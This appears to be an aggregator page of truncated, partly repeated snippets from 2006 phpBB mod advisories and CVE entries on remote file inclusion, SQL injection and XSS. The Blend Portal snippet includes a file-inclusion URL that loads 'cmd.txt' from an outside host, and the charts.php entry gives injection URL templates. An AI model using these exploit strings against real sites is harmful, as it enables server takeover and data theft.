Activity MOD Plus 1.1.0 - 'phpBB Mod' File Inclusion

phpBB 2.x Activity MOD Plus File Inclusion Vulnerability Contacts ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on phpBB 2.x Activity MOD Plus Original advisory can be found at: http://www.nukedx.com/?viewdoc=38 Succesful exploitation needs registerglobals on GET ...

Blend Portal 1.2.0 - 'phpBB Mod' Remote File Inclusion

Blend Portal ICQ: 10072 MSN/Mail: [email protected] web: www.nukedx.com This exploits works on Blend Portal http://victim/phpBB/blenddata/blendcommon.php?phpbbrootpath=FILE EXAMPLE - http://victim/phpBB/blenddata/blendcommon.php?phpbbrootpath=http://yoursite.com/cmd.txt? nukedx.com 2006-05-28...

phpBB can be used as HTTP proxy with vulnerability-vulnerability warning-the black bar safety net

Affected system: phpBB Group phpBB 2.0.20 Description: -------------------------------------------------------------------------------- BUGTRAQ ID: 1 7 9 6 5 phpBB is a PHP language implementation of a Web-based open source Forum program, the use of more widely. It supports multiple databases as...

View Topic Flood phpBB, MercuryBoard, Vbulletin, Ipb

Author: SpiderZ Exploit: http://spiderz.netsons.org/exploit/10.txt...

Remote file inclusion

Multiple PHP remote file inclusion vulnerabilities in Teake Nutma Foing 0.2.0 through 0.7.0, as used with phpBB, allow remote attackers to execute arbitrary PHP code via a URL in the phpbbrootpath parameter in 1 index.php, 2 song.php, 3 faq.php, 4 list.php, 5 genm3u.php, and 6 playlist.php...

CVE-2006-2507

CVE-2006-2507 affects Teake Nutma Foing 0.2.0–0.7.0 used with phpBB. The vulnerability is a PHP remote file inclusion via an unvalidated URL in the phpbb_root_path parameter in index.php, song.php, faq.php, list.php, gen_m3u.php, and playlist.php, allowing remote attackers to execute arbitrary PH...

phpBBcharts.txt

// phpBB "charts.php" hack XSS and SQL-Injection // ----------------------------------------------------------------- Advisory by: LoK-Crew - Exploit: http://www.example.com/charts.php?action=vote&rate=1&id=XSS http://www.example.com/charts.php?action=vote&rate=1&id=SQL - Googledork:...

foing-remote-file.txt

Kurdish Security Advisory Original Advisory : http://kurdishsecurity.blogspot.com/2006/05/kurdish-security-7-foing-remote-file.html Foing Remote File Include Vulnerability PHPBB : "Ey Tarih ya sana basarilar atfedecegiz ya da seni yasanmamis sayacagiz ." Abdullah Ocalan STOP THE MASSACRE IN THE...

phpBB Mod [2.0.20] SQL Backup ( Remote File Inclusion )

/ ,, / / '-./.-' .--' '--. / / /"" SpiderZ ForumZ Security | | | | / / '..' = Autore: SpiderZ = phpBB Mod 2.0.20 SQL Backup Remote File Inclusion = Sito: http://www.spiderz.altervista.org = Sito2: https://www.spiderz.netsons.org Remote File Inclusion mod phpbb 2.0.20 http://www. Tuo sito Web /...

CVE-2006-2359

Cross-site scripting XSS vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this issue might be resultant from SQL injection...

Sql injection

SQL injection vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter...

Cross site scripting

Cross-site scripting XSS vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this issue might be resultant from SQL injection...

Remote file inclusion

PHP remote file inclusion vulnerability in pafiledbconstants.php in Download Manager mxBB pafiledb integration, as used with phpBB, allows remote attackers to execute arbitrary PHP code via a URL in the modulerootpath parameter...

CVE-2006-2360

SQL injection vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter...

CVE-2006-2359

Cross-site scripting XSS vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to inject arbitrary web script or HTML via the id parameter. NOTE: this issue might be resultant from SQL injection...

CVE-2006-2360

SQL injection vulnerability in charts.php in the Chart mod for phpBB allows remote attackers to execute arbitrary SQL commands via the id parameter...

CVE-2006-2361

CVE-2006-2361 describes a PHP remote file inclusion in pafiledb_constants.php within the Download Manager (mxBB pafiledb) integration used with phpBB. The underlying issue is an attacker-controlled URL in the module_root_path parameter that can lead to arbitrary PHP code execution on the server. ...

CVE-2006-2359

XSS vulnerability CVE-2006-2359 affects the phpBB Chart mod (charts.php) via the id parameter. The issue allows remote attackers to inject arbitrary script/HTML, with the note that it may stem from SQL injection. Base metrics indicate MEDIUM risk (CVSSv2: AV=N/AC=M/Au=N/C=N/I=P/A=N, base score 4....

CVE-2006-2360

CVE-2006-2360 is an SQL injection vulnerability in the Chart Mod for phpBB, specifically in charts.php via the id parameter. Affected component is the Chart mod for phpBB; the root cause is improper input handling allowing the execution of arbitrary SQL commands by remote attackers. Documented im...

CVE-2006-2361

PHP remote file inclusion vulnerability in pafiledbconstants.php in Download Manager mxBB pafiledb integration, as used with phpBB, allows remote attackers to execute arbitrary PHP code via a URL in the modulerootpath parameter...